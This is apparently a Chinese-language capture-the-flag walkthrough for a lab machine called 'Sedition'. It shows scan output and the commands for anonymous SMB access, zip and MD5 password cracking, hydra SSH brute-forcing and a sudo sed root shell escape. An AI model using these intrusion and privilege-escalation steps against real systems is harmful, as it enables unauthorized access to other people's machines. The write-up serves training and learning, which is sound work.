Sedition

image

信息搜集

192.168.100.71

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.71
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.71:139
Open 192.168.100.71:445
Open 192.168.100.71:65535
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:40 +0800
Initiating ARP Ping Scan at 15:40
Scanning 192.168.100.71 [1 port]
Completed ARP Ping Scan at 15:40, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:40
Scanning 192.168.100.71 [3 ports]
Discovered open port 65535/tcp on 192.168.100.71
Discovered open port 139/tcp on 192.168.100.71
Discovered open port 445/tcp on 192.168.100.71
Completed SYN Stealth Scan at 15:40, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.100.71
Host is up, received arp-response (0.00067s latency).
Scanned at 2026-03-26 15:40:51 CST for 0s

PORT      STATE SERVICE      REASON
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
65535/tcp open  unknown      syn-ack ttl 64
MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

枚举 smb 445

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# smbclient -L 192.168.100.71
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        backup          Disk
        IPC$            IPC       IPC Service (Samba Server)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.100.71 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

可以看到有个backup,并且可以匿名登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# smbclient //192.168.100.71/backup
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul  7 01:02:53 2025
  ..                                  D        0  Mon Jul  7 02:15:13 2025
  secretito.zip                       N      216  Mon Jul  7 01:02:31 2025

                19480400 blocks of size 1024. 16262084 blocks available
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (42.2 KiloBytes/sec) (average 42.2 KiloBytes/sec)
smb: \>

backup里面有一个secretito.zip直接get下来

image

解压发现需要密码,尝试爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# zip2john secretito.zip > secretito
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0

┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt secretito
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian        (secretito.zip/password)
1g 0:00:00:00 DONE (2026-03-26 15:48) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

image

得到一个密码elbunkermolagollon123,经过尝试发现不是smb的,前面rustscan扫描出还有一个端口但并不清楚是什么服务,继续枚举一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# rustscan -a 192.168.100.71 -p 65535 -- -sV -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.71:65535
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.100.71
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:54 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Initiating ARP Ping Scan at 15:54
Scanning 192.168.100.71 [1 port]
Completed ARP Ping Scan at 15:54, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:54
Scanning 192.168.100.71 [1 port]
Discovered open port 65535/tcp on 192.168.100.71
Completed SYN Stealth Scan at 15:54, 0.01s elapsed (1 total ports)
Initiating Service scan at 15:54
Scanning 1 service on 192.168.100.71
Completed Service scan at 15:54, 0.02s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.100.71.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Nmap scan report for 192.168.100.71
Host is up, received arp-response (0.00066s latency).
Scanned at 2026-03-26 15:54:17 CST for 1s

PORT      STATE SERVICE REASON         VERSION
65535/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG/Kzfk09iAKKpRuJrSfx4A4WiSlvP++mk2g5NcP7Bfva4A0l0SZxeDNKXB6iJN1++qyQWE2OUVzLrZ8Gdjkn+M=
|   256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvZ909p40dk+Vi+xYHAfVXI4wI0XGPS/fgHXpFI2mRP
MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.84 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

是一个ssh的服务,那么大概率刚刚的密码就是某个用户的密码,现在还缺少用户

hydra爆破

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p elbunkermolagollon123 -s 65535 ssh://192.168.100.71
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-26 15:57:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.100.71:65535/
[65535][ssh] host: 192.168.100.71   login: cowboy   password: elbunkermolagollon123
[STATUS] 312.00 tries/min, 312 tries in 00:01h, 8295145 to do in 443:08h, 14 active
[STATUS] 290.67 tries/min, 872 tries in 00:03h, 8294586 to do in 475:37h, 13 active

cowboy:elbunkermolagollon123

ssh登录

1
ssh -p 65535 cowboy@192.168.100.71

image

提权

cowboy -> debian

image

可以看到.bash_history历史命令并没有被重定向到/dev/null

历史命令登录过mariadb。去数据库信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bunker             |
| information_schema |
+--------------------+
2 rows in set (0,002 sec)

MariaDB [(none)]> use bunker;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users            |
+------------------+
1 row in set (0,001 sec)

MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user   | password                         |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,001 sec)

MariaDB [bunker]>

得到了新账号和密码

密码还需要md5解密一下 https://www.cmd5.com/default.aspx

image

debian:password1

image

debian -> root

可以进行sed提权

1
2
3
4
5
6
debian@Sedition:/home/cowboy$ sudo -l
Matching Defaults entries for debian on sedition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed

https://gtfobins.org/gtfobins/sed/

1
sudo sed -n '1e exec /bin/sh 1>&0' /etc/hosts

image